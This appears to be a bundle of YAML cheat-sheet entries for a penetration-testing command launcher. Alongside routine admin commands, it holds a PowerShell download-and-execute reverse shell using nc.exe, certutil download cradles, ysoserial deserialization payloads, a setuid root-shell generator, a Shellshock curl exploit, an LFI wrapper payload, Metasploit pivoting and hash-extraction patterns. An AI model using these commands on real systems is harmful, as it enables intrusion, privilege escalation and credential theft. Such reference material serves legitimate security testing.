/files/Deserialization/ysoserial.net.yaml: -------------------------------------------------------------------------------- 1 | name: ysoserial.net 2 | tags: [.net, unserialize] 3 | data: | 4 | 5 | ysoserial.net - generate payload VIEWSTATE 6 | plateform/windows #target/local #cat/ATTACK/GENERATE_PAYLOAD 7 | ```cmd 8 | ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -EncodedCommand " --path="" --apppath="" --decryptionalg="3DES" --decryptionkey="" --validationalg="SHA1" --validationkey="" 9 | ``` 10 | 11 | ysoserial.net - calc.exe payload for Json.Net using ObjectDataProvider gadget. 12 | plateform/windows #target/local #cat/ATTACK/GENERATE_PAYLOAD 13 | ```cmd 14 | ysoserial.exe -f -g -o raw -c "" -t 15 | ``` 16 | 17 | 18 | -------------------------------------------------------------------------------- /files/Deserialization/ysoserial.yaml: -------------------------------------------------------------------------------- 1 | name: ysoserial 2 | tags: [java, unserialize ] 3 | data: | 4 | 5 | ysoserial java - generate payload 6 | plateform/linux #target/local #cat/ATTACK/GENERATE_PAYLOAD 7 | 8 | https://github.com/frohoff/ysoserial 9 | 10 | ```bash 11 | java -jar ysoserial.jar 'powershell.exe -EncodedCommand ' > 12 | ``` 13 | 14 | convert file to base64 one line 15 | plateform/linux #target/local #cat/UTILS 16 | 17 | ```bash 18 | iconv -f ASCII -t UTF-16LE | base64 | tr -d "\n" 19 | ``` 20 | 21 | = lib_payload : CommonsCollections1 22 | -------------------------------------------------------------------------------- /files/Files/Download/certutil.yaml: -------------------------------------------------------------------------------- 1 | name: certutil 2 | tags: [windows, download, certutil] 3 | data: | 4 | 5 | download with certutil 6 | plateform/windows #target/remote #cat/ATTACK/FILE_TRANSFERT 7 | ``` 8 | certutil.exe -urlcache -split -f http:/// 9 | ``` 10 | 11 | download with certutil (2) 12 | plateform/windows #target/remote 
#cat/ATTACK/FILE_TRANSFERT 13 | ``` 14 | certutil.exe -verifyctl -f -split http:/// 15 | ``` 16 | 17 | base64 encode with certutil 18 | plateform/windows #target/local #cat/UTILS 19 | ``` 20 | certutil -encode inFileName outFileName 21 | ``` 22 | 23 | base64 decode with certutil 24 | plateform/windows #target/local #cat/UTILS 25 | ``` 26 | certutil -decode inFileName outFileName 27 | ``` -------------------------------------------------------------------------------- /files/Files/Download/powershell.yaml: -------------------------------------------------------------------------------- 1 | name: powershell 2 | tags: [powershell, download] 3 | data: | 4 | 5 | Download with powershell 6 | plateform/windows #target/remote #cat/ATTACK/FILE_TRANSFERT 7 | ```powershell 8 | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "(New-Object System.Net.WebClient).DownloadFile('http:///','')" 9 | ``` 10 | 11 | Download and execute with powershell 12 | plateform/windows #target/remote #cat/ATTACK/FILE_TRANSFERT #cat/ATTACK/EXPLOIT 13 | ```powershell 14 | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "(New-Object System.Net.WebClient).DownloadFile('','nc.exe'); .\nc.exe -e cmd.exe" 15 | ``` -------------------------------------------------------------------------------- /files/Files/Server/server.yaml: -------------------------------------------------------------------------------- 1 | name: server 2 | tags: [server] 3 | data: | 4 | 5 | python Simple HTTP server 6 | plateform/linux #target/serve #cat/ATTACK/LISTEN-SERVE 7 | ```bash 8 | python -m SimpleHTTPServer 9 | ``` 10 | 11 | python3 Simple HTTP server 12 | plateform/linux #target/serve #cat/ATTACK/LISTEN-SERVE 13 | ```bash 14 | python3 -m http.server 15 | ``` 16 | 17 | php Simple builtin server 18 | plateform/linux #target/serve #cat/ATTACK/LISTEN-SERVE 19 | ``` 20 | php -S 0.0.0.0: 21 | ``` 22 | 23 | = lport : 8080 24 | -------------------------------------------------------------------------------- /files/Install/brew.yaml:
-------------------------------------------------------------------------------- 1 | name: Brew 2 | tags: [brew] 3 | data: | 4 | plateform/mac #target/local #cat/UTILS 5 | 6 | update brew's package index 7 | ``` 8 | brew update 9 | ``` 10 | 11 | upgrade all installed packages 12 | ``` 13 | brew upgrade 14 | ``` 15 | 16 | get info for a package 17 | ``` 18 | brew info 19 | ``` 20 | 21 | get info for a cask (the separate `brew cask` command was removed in Homebrew 2.6; casks are now selected with --cask) 22 | ``` 23 | brew info --cask 24 | ``` 25 | 26 | install a package 27 | ``` 28 | brew install 29 | ``` 30 | 31 | install a cask 32 | ``` 33 | brew install --cask 34 | ``` 35 | 36 | uninstall a package 37 | ``` 38 | brew uninstall 39 | ``` 40 | 41 | uninstall a cask 42 | ``` 43 | brew uninstall --cask 44 | ``` 45 | 46 | edit package formula 47 | ``` 48 | brew edit 49 | ``` 50 | 51 | edit cask 52 | ``` 53 | brew edit --cask 54 | ``` 55 | -------------------------------------------------------------------------------- /files/Install/yum.yaml: -------------------------------------------------------------------------------- 1 | name: yum 2 | tags: [yum] 3 | data: | 4 | plateform/linux #target/local #cat/UTILS 5 | 6 | List all available packages 7 | ``` 8 | yum list available 9 | ``` 10 | 11 | List all installed packages 12 | ``` 13 | yum list installed 14 | ``` 15 | 16 | Info about package 17 | ``` 18 | yum info 19 | ``` 20 | 21 | Search in repository (packages and descriptions) 22 | ``` 23 | yum search 24 | ``` 25 | 26 | List all history actions (install, update and erase) 27 | ``` 28 | yum history list 29 | ``` 30 | 31 | Check updates for installed packages 32 | ``` 33 | yum check-update 34 | ``` 35 | 36 | Update all packages 37 | ``` 38 | yum update 39 | ``` 40 | 41 | Update a specific/individual package 42 | ``` 43 | yum update 44 | ``` 45 | 46 | Downgrade package 47 | ``` 48 | yum downgrade 49 | ``` 50 | 51 | Install a package from repository 52 | ``` 53 | yum install 54 | ``` 55 | 56 | Remove/delete package 57 | ``` 58 | yum remove 59 | ``` 60 | 61 | Install local rpm package 62 | ``` 63 | yum localinstall 64 | ```
65 | 66 | Install security updates 67 | ``` 68 | yum update --security 69 | ``` 70 | 71 | List dependencies of package 72 | ``` 73 | yum deplist 74 | ``` 75 | 76 | Remove un-needed packages and dependencies 77 | ``` 78 | yum autoremove 79 | ``` 80 | 81 | Whatprovides package/file/binary 82 | ``` 83 | yum whatprovides 84 | ``` 85 | 86 | List currently enabled repositories 87 | ``` 88 | yum repolist 89 | ``` -------------------------------------------------------------------------------- /files/Language/Java/java.yaml: -------------------------------------------------------------------------------- 1 | name: Java 2 | tags: [java] 3 | data: | 4 | 5 | # RMI 6 | plateform/linux #target/remote #cat/ATTACK/EXPLOIT 7 | ``` 8 | msfconsole -x "use exploit/multi/misc/java_rmi_server" 9 | ``` 10 | -------------------------------------------------------------------------------- /files/Language/Java/keytool.yaml: -------------------------------------------------------------------------------- 1 | name: keytool 2 | tags: [java keytool, certificate, encryption] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/UTILS 6 | 7 | Generate a Java keystore and key pair 8 | ``` 9 | keytool -genkey -alias -keyalg RSA -keystore -keysize 10 | ``` 11 | 12 | Generate a certificate signing request (CSR) for an existing Java keystore 13 | ``` 14 | keytool -certreq -alias -keystore -file 15 | ``` 16 | 17 | Import a root or intermediate CA certificate to an existing Java keystore 18 | ``` 19 | keytool -import -trustcacerts -alias root -file -keystore 20 | ``` 21 | 22 | Import a signed primary certificate to an existing Java keystore 23 | ``` 24 | keytool -import -trustcacerts -alias -file -keystore 25 | ``` 26 | 27 | Generate a keystore and self-signed certificate 28 | ``` 29 | keytool -genkey -keyalg RSA -alias -keystore -storepass -validity -keysize 30 | ``` 31 | 32 | Check a stand-alone certificate 33 | ``` 34 | keytool -printcert -v -file 35 | ``` 36 | 37 | Check which certificates are in 
a Java keystore 38 | ``` 39 | keytool -list -v -keystore 40 | ``` 41 | 42 | Check a particular keystore entry using an alias 43 | ``` 44 | keytool -list -v -keystore -alias 45 | ``` 46 | 47 | Remove a certificate from a keystore 48 | ``` 49 | keytool -delete -alias -keystore 50 | ``` 51 | 52 | Change the password of a keystore 53 | ``` 54 | keytool -storepasswd -keystore -new 55 | ``` 56 | 57 | Export a certificate from a keystore 58 | ``` 59 | keytool -export -alias -file -keystore 60 | ``` 61 | 62 | List the trusted CA certs from the default Java trusted certs keystore (JDK 8 path; from JDK 9 on the file is $JAVA_HOME/lib/security/cacerts) 63 | ``` 64 | keytool -list -v -keystore $JAVA_HOME/jre/lib/security/cacerts 65 | ``` 66 | 67 | Import a new Certificate Authority into the default Java trusted certs keystore (anything imported here is trusted by every Java process using that JDK, so it is both a hardening step and a persistence/interception target) 68 | ``` 69 | keytool -import -trustcacerts -file -alias -keystore $JAVA_HOME/jre/lib/security/cacerts 70 | ``` 71 | -------------------------------------------------------------------------------- /files/Language/c.yaml: -------------------------------------------------------------------------------- 1 | name: C 2 | tags: [c, setuid] 3 | data: | 4 | generate a setuid root shell binary 5 | plateform/linux #target/local #cat/CODE/SAMPLE #cat/ATTACK/GENERATE_PAYLOAD 6 | 7 | ```bash 8 | printf '#include <stdlib.h>\n#include <unistd.h>\nint main(void){ setreuid(0,0); system("/bin/bash"); return 0; }\n' > pwn.c; 9 | gcc pwn.c -o ; 10 | rm pwn.c 11 | ``` 12 | The headers are needed so setreuid()/system() are declared (recent gcc rejects implicit declarations). The binary only elevates once it is owned by root with the setuid bit set, e.g. dropped where a root cron job or root-run script will chown/chmod it. 13 | -------------------------------------------------------------------------------- /files/Language/javascript.yaml: -------------------------------------------------------------------------------- 1 | name: npm 2 | tags: [npm, node, js] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/UTILS 6 | 7 | initialise a new package 8 | ``` 9 | npm init 10 | ``` 11 | 12 | initialise a new package with default answers 13 | ``` 14 | npm init -y 15 | ``` 16 | 17 | install all dependencies 18 | ``` 19 | npm install 20 | ``` 21 | 22 | install all dev dependencies 23 | ``` 24 | npm install --save-dev 25 | ``` 26 | 27 | install a specified package 28 | ```
29 | npm install 30 | ``` 31 | 32 | install a specified dev package 33 | ``` 34 | npm install --save-dev 35 | ``` 36 | 37 | install globally a specified package 38 | ``` 39 | npm install -g 40 | ``` 41 | 42 | nvm 43 | 44 | % nvm, node, js 45 | 46 | plateform/linux #target/local #cat/UTILS 47 | 48 | install a specified version of node 49 | ``` 50 | nvm install 51 | ``` 52 | 53 | list available versions 54 | ``` 55 | nvm ls-remote 56 | ``` 57 | 58 | use an installed node version 59 | ``` 60 | nvm use 61 | ``` 62 | 63 | set a node version as default 64 | ``` 65 | nvm alias default 66 | ``` -------------------------------------------------------------------------------- /files/Language/nodejs.yaml: -------------------------------------------------------------------------------- 1 | name: nodejs 2 | tags: [whitebox, nodejs] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/CODE/WHITEBOX 6 | 7 | command execution 8 | ``` 9 | grep -rn --include "*.js" -e "^\(.*\s\|.*child_process.*\|\)\(exec\|spawn\|eval\|execSync\|spawnSync\|execFileSync\)(" --color 10 | ``` 11 | 12 | require 13 | ``` 14 | grep -rn --include "*.js" -e "^\(.*\s\|\)\(require\)(" --color 15 | ``` 16 | 17 | file 18 | ``` 19 | grep -rn --include "*.js" -e "^\(.*\s\|\)\(appendFile\|open\|readFile\|writeFile\|unlink\|rename\|formidable\)(" --color 20 | ``` 21 | 22 | unserialize 23 | ``` 24 | grep -rn --include "*.js" -e "unserialize(" --color 25 | ``` 26 | -------------------------------------------------------------------------------- /files/Language/php.yaml: -------------------------------------------------------------------------------- 1 | name: php grep 2 | tags: [php, whitebox] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/CODE/WHITEBOX 6 | 7 | php grep include 8 | ``` 9 | grep -rn --include "*.php" -e "^\(.*\s\|\)\(include\|require\|virtual\|require_once\|include_once\)\(\s\|(\).*\\$" --color 10 | ``` 11 | 12 | php grep path traversal 13 | ``` 14 | grep -rn --include "*.php" -e
"^\(.*\s\|\)\(readfile\|file_get_contents\|stream_get_contents\|show_source\|fopen\|file\|fpassthru\|gzopen\|gzfile\|gzpassthru\|readgzfile\)\(\s\|(\).*\\$" --color 15 | ``` 16 | 17 | php grep exec 18 | ``` 19 | grep -rn --include "*.php" -e "^\(.*\s\|\)\(eval\|popen\|pcntl_exec\|assert\|proc_open\|create_function\|call_user_func\|call_user_func_array\|exec\|shell_exec\|system\|passthru\|virtual\)([^)]*\\$" --color 20 | ``` 21 | 22 | php grep replace 23 | ``` 24 | grep -rn --include "*.php" -e "^\(.*\s\|\)\(preg_replace\|ereg_replace\|eregi_replace\|mb_ereg_replace\|mb_eregi_replace\)(.*\\$" --color 25 | ``` 26 | 27 | php grep unserialize 28 | ``` 29 | grep -rn --include "*.php" -e "^\(.*\s\|\)unserialize(.*\\$" --color 30 | ``` 31 | 32 | php grep ldap 33 | ``` 34 | grep -rn --include "*.php" -e "^\(.*\s\|\)ldap_search(.*\\$" --color 35 | ``` 36 | 37 | php grep xpath 38 | ``` 39 | grep -rn --include "*.php" -e "^\(.*\s\|\)xpath.*\\$" --color 40 | ``` 41 | 42 | php grep mail 43 | ``` 44 | grep -rn --include "*.php" -e "^\(.*\s\|\)mail(.*\\$" --color 45 | ``` 46 | 47 | php grep echo 48 | ``` 49 | grep -rn --include "*.php" -e "^\(.*\s\|\)\(echo\|printf\|print\)\(\s\|(\).*\\$" --color 50 | ``` 51 | 52 | php grep weak comparison (loose == against 0 or another variable; the original pattern only caught one-character variable names) 53 | ``` 54 | grep -rn --include "*.php" -e "\(\\\$[A-Za-z_][A-Za-z0-9_]*\|0\)\s*==\s*\(0\|\\\$[A-Za-z_][A-Za-z0-9_]*\)" --color 55 | ``` 56 | 57 | php grep entry points 58 | ``` 59 | grep -rn --include "*.php" -e "\(\$_GET\|\$_POST\|\$_FILES\|\$_REQUEST\|\$_COOKIE\|\$_SESSION\|\$_SERVER\|\$GLOBALS\)" --color 60 | ``` 61 | 62 | php grep callbacks 63 | ``` 64 | grep -rn --include "*.php" -e
"^\(.*\s\|\)\(ob_start\|array_diff_uassoc\|array_diff_ukey\|array_filter\|array_intersect_uassoc\|array_intersect_ukey\|array_map\|array_reduce\|array_udiff_assoc\|array_udiff_uassoc\|array_udiff\|array_uintersect_assoc\|array_uintersect_uassoc\|array_uintersect\|array_walk_recursive\|array_walk\|assert_options\|uasort\|uksort\|usort\|preg_replace_callback\|spl_autoload_register\|iterator_apply\|register_shutdown_function\|register_tick_function\|set_error_handler\|set_exception_handler\|session_set_save_handler\|sqlite_create_aggregate\|sqlite_create_function\)(.*\\$" 65 | ``` 66 | 67 | php grep curl 68 | ``` 69 | grep -rn --include "*.php" -e "curl_exec" --color 70 | ``` 71 | 72 | php grep where or query (SQL built with a variable on the same line) 73 | ``` 74 | grep -rni --include "*.php" -e "\(where\|query\).*\\$" 75 | ``` 76 | 77 | php grep files that do not include the auth file (candidates for missing access control) 78 | ``` 79 | for f in *.php; do grep -q "/include/auth.php" "$f" || echo "$f"; done 80 | ``` 81 | 82 | php wrapper lfi (read source instead of executing it; decode the response with base64 -d) 83 | ``` 84 | curl ?=php://filter/read=convert.base64-encode/resource=.php 85 | ``` 86 | -------------------------------------------------------------------------------- /files/Linux/crontab.yaml: -------------------------------------------------------------------------------- 1 | name: Crontab 2 | tags: [crontab, schedule] 3 | data: | 4 | 5 | List cron jobs 6 | plateform/linux #target/local #cat/UTILS 7 | ``` 8 | crontab -l 9 | ``` 10 | 11 | Edit cron job 12 | plateform/linux #target/local #cat/UTILS 13 | ``` 14 | crontab -e 15 | ``` -------------------------------------------------------------------------------- /files/Linux/grep.yaml: -------------------------------------------------------------------------------- 1 | name: grep 2 | tags: [grep] 3 | data: | 4 | 5 | grep classic 6 | 7 | ``` 8 | grep 9 | ``` 10 | 11 | grep case-insensitive 12 | 13 | ``` 14 | grep -i 15 | ``` 16 | 17 | grep, printing the file name with each match 18 | 19 | ``` 20 | grep -H 21 | ``` 22 | 23 | grep recursive on extension 24 | 25 |
``` 26 | grep -rn --include "*." 27 | ``` 28 | 29 | grep word A or B 30 | 31 | ``` 32 | grep -e "\(\|\)" 33 | ``` 34 | 35 | grep hash 36 | 37 | plateform/linux #target/local #cat/UTILS 38 | The hex patterns only bound the digest by non-hex characters, so any 32/40/64/128-character hex token (session ids, UUID fragments) is extracted as well; the prefixed formats below are matched on their exact prefix and field lengths. 39 | Extract md5 hashes ({32}) 40 | 41 | ``` 42 | egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt 43 | ``` 44 | 45 | Extract sha1 ({40}) 46 | 47 | ``` 48 | egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{40}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{40}' > sha1-hashes.txt 49 | ``` 50 | 51 | Extract sha256({64}) 52 | 53 | ``` 54 | egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{64}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{64}' > sha256-hashes.txt 55 | ``` 56 | 57 | Extract sha512({128}) 58 | 59 | ``` 60 | egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{128}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{128}' > sha512-hashes.txt 61 | ``` 62 | 63 | Extract MySQL-Old (pre-4.1, 16 hex) hashes 64 | 65 | ``` 66 | grep -E -o "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" *.txt > mysql-old-hashes.txt 67 | ``` 68 | 69 | Extract bcrypt (blowfish) hashes: $2a$/$2b$/$2y$, 2-digit cost, 53-character salt+hash 70 | 71 | ``` 72 | egrep -o '\$2[aby]\$[0-9]{2}\$[./A-Za-z0-9]{53}' *.txt > blowfish-hashes.txt 73 | ``` 74 | 75 | Extract Joomla hashes (md5:salt) 76 | 77 | ``` 78 | egrep -o "([0-9a-zA-Z]{32}):(\w{16,32})" *.txt > joomla.txt 79 | ``` 80 | 81 | Extract VBulletin hashes (md5:salt) 82 | ``` 83 | egrep -o "([0-9a-zA-Z]{32}):(\S{3,32})" *.txt > vbulletin.txt 84 | ``` 85 | 86 | Extract phpBB3-MD5 (phpass $H$) 87 | ``` 88 | egrep -o '\$H\$\S{31}' *.txt > phpBB3-md5.txt 89 | ``` 90 | 91 | Extract Wordpress-MD5 (phpass $P$) 92 | ``` 93 | egrep -o '\$P\$\S{31}' *.txt > wordpress-md5.txt 94 | ``` 95 | 96 | Extract Drupal 7 ($S$) 97 | ``` 98 | egrep -o '\$S\$\S{52}' *.txt > drupal-7.txt 99 | ``` 100 | 101 | Extract old Unix-md5 (md5crypt $1$, salt up to 8 chars, 22-char hash) 102 | ``` 103 | egrep -o '\$1\$[^$]{1,8}\$[./A-Za-z0-9]{22}' *.txt > md5-unix-old.txt 104 | ``` 105 | 106 | Extract md5-apr1 (Apache htpasswd) 107 | ``` 108 | egrep -o '\$apr1\$[^$]{1,8}\$[./A-Za-z0-9]{22}' *.txt > md5-apr1.txt 109 | ``` 110 | 111 | Extract sha512crypt, SHA512(Unix) ($6$, salt up to 16 chars, 86-char hash) 112 | ``` 113 | egrep -o '\$6\$[^$]{1,16}\$[./A-Za-z0-9]{86}' *.txt > sha512crypt.txt 114 | ```
115 | 116 | 117 | Others grep 118 | 119 | plateform/linux #target/local #cat/UTILS 120 | 121 | Extract emails from file 122 | ``` 123 | grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" 124 | ``` 125 | 126 | Extract valid IP addresses (no word boundaries, so longer digit runs can yield false matches) 127 | ``` 128 | grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" 129 | ``` 130 | 131 | Extract passwords 132 | ``` 133 | grep -i "pwd\|passw" 134 | ``` 135 | 136 | Extract users 137 | ``` 138 | grep -i "user\|invalid\|authentication\|login" 139 | ``` 140 | 141 | Extract HTTP URLS 142 | ``` 143 | grep -i http | grep -shoP 'http.*?[" >]' > http-urls.txt 144 | ``` 145 | 146 | = file: file.txt 147 | -------------------------------------------------------------------------------- /files/Linux/i686-w64-mingw32-gcc.yaml: -------------------------------------------------------------------------------- 1 | name: Compile windows PE 32 2 | tags: [compile] 3 | data: | 4 | 5 | compile windows PE 32 executable on linux (the source file goes before -o; keep -lws2_32 after it, since GNU ld resolves Winsock symbols only from libraries that appear after the objects that need them) 6 | plateform/linux #target/local #cat/CODE/COMPILE 7 | 8 | ``` 9 | i686-w64-mingw32-gcc -o -lws2_32 10 | ``` 11 | 12 | -------------------------------------------------------------------------------- /files/Linux/linux.yaml: -------------------------------------------------------------------------------- 1 | name: linux bash 2 | tags: [shell, linux] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/UTILS #cat/PRIVESC #cat/RECON 6 | 7 | Re-run the last command with sudo 8 | ``` 9 | sudo !! 10 | ``` 11 | 12 | Help 13 | ``` 14 | help cd / help dir (...) 15 | ``` 16 | 17 | Finding Help 18 | ``` 19 | apropos directory / apropos search (...)
20 | ``` 21 | 22 | Define custom startup screen 23 | ``` 24 | sudo nano /etc/motd 25 | ``` 26 | 27 | Run a script as background process 28 | ``` 29 | & 30 | ``` 31 | 32 | List all running processes 33 | ``` 34 | ps -A 35 | ``` 36 | 37 | Kill a running process 38 | ``` 39 | killall 40 | ``` 41 | 42 | Get the current path 43 | ``` 44 | pwd 45 | ``` 46 | 47 | Get the current hostname 48 | ``` 49 | hostname 50 | ``` 51 | 52 | Get the current users 53 | ``` 54 | users 55 | ``` 56 | 57 | Show calendar 58 | ``` 59 | cal 60 | ``` 61 | 62 | Show today's date 63 | ``` 64 | date 65 | ``` 66 | 67 | Exit terminal 68 | ``` 69 | exit 70 | ``` 71 | 72 | show process command 73 | ``` 74 | ps -ef | grep apache | grep -v grep 75 | ``` 76 | 77 | Change group 78 | ``` 79 | chgrp 80 | ``` 81 | 82 | List directory contents by size 83 | ``` 84 | ls -Slrh 85 | ``` 86 | 87 | List all directory contents sorted by time edited reverse 88 | ``` 89 | ls -altr 90 | ``` 91 | 92 | List directory (wildcard matching) 93 | ``` 94 | ls *. 95 | ``` 96 | 97 | List all files of type 98 | ``` 99 | find . -name *. 
-print 100 | ``` 101 | 102 | Go back to previous directory 103 | ``` 104 | cd - 105 | ``` 106 | 107 | Make (empty) directory 108 | ``` 109 | mkdir 110 | ``` 111 | 112 | Remove (empty) directory 113 | ``` 114 | rmdir 115 | ``` 116 | 117 | Remove directory with all contents without prompt 118 | ``` 119 | rm -rf 120 | ``` 121 | 122 | Remove directory contents and keep directory 123 | ``` 124 | rm -rf * 125 | ``` 126 | 127 | Change directory 128 | ``` 129 | cd 130 | ``` 131 | 132 | Create symlink 133 | ``` 134 | ln -s 135 | ``` 136 | 137 | Update symlink 138 | ``` 139 | ln -sfn 140 | ``` 141 | 142 | Remove symlink 143 | ``` 144 | unlink 145 | ``` 146 | 147 | Make (empty) file 148 | ``` 149 | touch 150 | ``` 151 | 152 | Copy file 153 | ``` 154 | cp 155 | ``` 156 | 157 | Copy folder with its content, preserving permissions and timestamps 158 | ``` 159 | cp -a / 160 | ``` 161 | 162 | Move/Rename file 163 | ``` 164 | mv 165 | ``` 166 | 167 | Move/Rename file and prompt before overwriting an existing file 168 | ``` 169 | mv -i 170 | ``` 171 | 172 | Remove file 173 | ``` 174 | rm 175 | ``` 176 | 177 | Write to file (will overwrite existing content) 178 | ``` 179 | cat > 180 | ``` 181 | 182 | Search for a filename (not content!)
in the current directory 183 | ``` 184 | find 185 | ``` 186 | 187 | Search for a string inside all files in the current directory and subdirectories 188 | ``` 189 | grep -r * 190 | ``` 191 | 192 | Search and replace within file 193 | ``` 194 | sed -i s///g 195 | ``` 196 | 197 | MD5 hash for files 198 | ``` 199 | md5sum 200 | ``` 201 | 202 | MD5 hash for folders 203 | ``` 204 | tar c | md5sum 205 | ``` 206 | 207 | Encrypt file (-pbkdf2 replaces the weak legacy key derivation that openssl otherwise warns about) 208 | ``` 209 | openssl enc -aes-256-cbc -pbkdf2 -e -in -out 210 | ``` 211 | 212 | Decrypt file 213 | ``` 214 | openssl enc -aes-256-cbc -pbkdf2 -d -in -out 215 | ``` 216 | 217 | Access via ssh 218 | ``` 219 | @ 220 | ``` 221 | 222 | Copy file from server to local 223 | ``` 224 | scp @: 225 | ``` 226 | 227 | Copy file from local to server 228 | ``` 229 | scp @: 230 | ``` 231 | 232 | Escape files with spaces in name like this 233 | ``` 234 | \\\ 235 | ``` 236 | 237 | Show disk space 238 | ``` 239 | df -h 240 | ``` 241 | 242 | Show disk space (inodes) 243 | ``` 244 | df -i 245 | ``` 246 | 247 | Show disk space for current directory 248 | ``` 249 | du -hs 250 | ``` 251 | 252 | Current processes (also CPU usage) 253 | ``` 254 | top or htop 255 | ``` 256 | 257 | Show running php processes 258 | ``` 259 | ps aux | grep php 260 | ``` 261 | 262 | Monitor error log (stream as file grows) 263 | ``` 264 | tail -f -n 0 error.log 265 | ``` 266 | 267 | Start application 268 | ``` 269 | xdg-open 270 | ``` 271 | 272 | Register variable 273 | ``` 274 | export = 275 | ``` 276 | 277 | Echo variable 278 | ``` 279 | echo $ 280 | ``` 281 | 282 | Unset variable 283 | ``` 284 | unset 285 | ``` 286 | 287 | Write to file 288 | ``` 289 | echo > 290 | ``` 291 | 292 | Append content from a file to another file 293 | ``` 294 | cat >> 295 | ``` 296 | 297 | Write the line, word and character counts of a file to another file 298 | ``` 299 | cat | | cat > 300 | ``` 301 | 302 | Sort the content of a file (output like cat) 303 | ``` 304 | sort 305 | ``` 306 | 307 | Save the sorted content to a new file 308 | ```
309 | cat | sort > 310 | ``` 311 | 312 | Sort and remove duplicates and save to a new file 313 | ``` 314 | sort | uniq > 315 | ``` 316 | 317 | shellshock (CVE-2014-6271, User-Agent variant against a CGI script) 318 | ``` 319 | curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" 320 | ``` 321 | -------------------------------------------------------------------------------- /files/Linux/misc.yaml: -------------------------------------------------------------------------------- 1 | name: QR code 2 | tags: [qr_code] 3 | data: | 4 | 5 | Create a QR code with some content 6 | plateform/linux #target/local #cat/UTILS 7 | 8 | ``` 9 | echo | curl -F-=\<- qrenco.de 10 | ``` 11 | 12 | json 13 | 14 | % json 15 | 16 | convert JSON to YAML 17 | plateform/linux #target/local #cat/UTILS 18 | ``` 19 | cat | ruby -ryaml -rjson -e 'puts YAML.dump(JSON.load(ARGF))' 20 | ``` 21 | 22 | linux 23 | 24 | % misc, linux 25 | 26 | Convert multi line to one line 27 | plateform/linux #target/local #cat/UTILS 28 | ``` 29 | grep | tr '\n' ' ' 30 | ``` 31 | 32 | grep nmap protocol from file and get ips in one line 33 | plateform/linux #target/local #cat/UTILS 34 | ``` 35 | grep .gnmap|cut -d ' ' -f 2 | tr '\n' ' ' 36 | ``` 37 | 38 | % scanner 39 | 40 | find service on port 41 | plateform/linux #target/remote #cat/RECON 42 | ``` 43 | amap -d 44 | ``` 45 | 46 | -------------------------------------------------------------------------------- /files/Linux/sed.yaml: -------------------------------------------------------------------------------- 1 | name: sed 2 | tags: [sed] 3 | data: | 4 | 5 | collapse runs of spaces to one (the pattern must require at least one space; a bare " *" also matches the empty string between every character) 6 | plateform/linux #target/local #cat/UTILS 7 | ``` 8 | sed -E 's/ +/ /g' 9 | ``` 10 | 11 | delete the last char 12 | plateform/linux #target/local #cat/UTILS 13 | ``` 14 | sed 's/.$//g' 15 | ``` 16 | -------------------------------------------------------------------------------- /files/Metsaploit/msf.yaml: -------------------------------------------------------------------------------- 1 | name: MSF 2 |
tags: [metasploit] 3 | data: | 4 | 5 | upgrade session to meterpreter 6 | plateform/linux #target/remote #cat/ATTACK/CONNECT 7 | ``` 8 | sessions -u 9 | ``` 10 | 11 | show session list 12 | plateform/linux #target/remote #cat/ATTACK/CONNECT 13 | ``` 14 | sessions -l 15 | ``` 16 | 17 | print route table 18 | plateform/linux #target/remote #cat/PIVOT/TUNNEL-PORTFW 19 | ``` 20 | route print 21 | ``` 22 | 23 | add pivot 24 | plateform/linux #target/remote #cat/PIVOT/TUNNEL-PORTFW 25 | ``` 26 | use multi/manage/autoroute 27 | ``` 28 | 29 | add socks proxy 30 | plateform/linux #target/remote #cat/PIVOT/TUNNEL-PORTFW 31 | ``` 32 | use auxiliary/server/socks_proxy 33 | ``` 34 | -------------------------------------------------------------------------------- /files/Metsaploit/searchsploit.yaml: -------------------------------------------------------------------------------- 1 | name: Searchsploit 2 | tags: [searchsploit, exploit-db] 3 | data: | 4 | 5 | searchsploit mirror (copy) an exploit by Exploit-DB id into the current directory 6 | plateform/linux #target/local #cat/UTILS #cat/RECON 7 | ``` 8 | searchsploit -m 9 | ``` 10 | 11 | searchsploit examine (view) an exploit by Exploit-DB id 12 | plateform/linux #target/local #cat/UTILS #cat/RECON 13 | ``` 14 | searchsploit -x 15 | ``` 16 | -------------------------------------------------------------------------------- /files/Mobile/Android/android.yaml: -------------------------------------------------------------------------------- 1 | name: Android Debug Bridge (adb) 2 | tags: [android, device, adb, bridge] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/ANDROID 6 | 7 | Get property 8 | adb -s shell getprop 9 | 10 | Install APK (-r reinstalls, keeping app data) 11 | adb -s install -r 12 | 13 | Uninstall package (adb uninstall takes a package name, not a file; -r is not a valid flag here) 14 | adb -s uninstall 15 | 16 | Clear user data for package 17 | adb -s shell pm clear 18 | 19 | Dispatch a deep-link / open URI 20 | adb -s shell am start 21 | 22 | Download apk 23 | adb pull "$(adb shell pm path "$(adb shell pm list packages | grep | cut -d : -f 2)" | cut -d : -f 2)" .
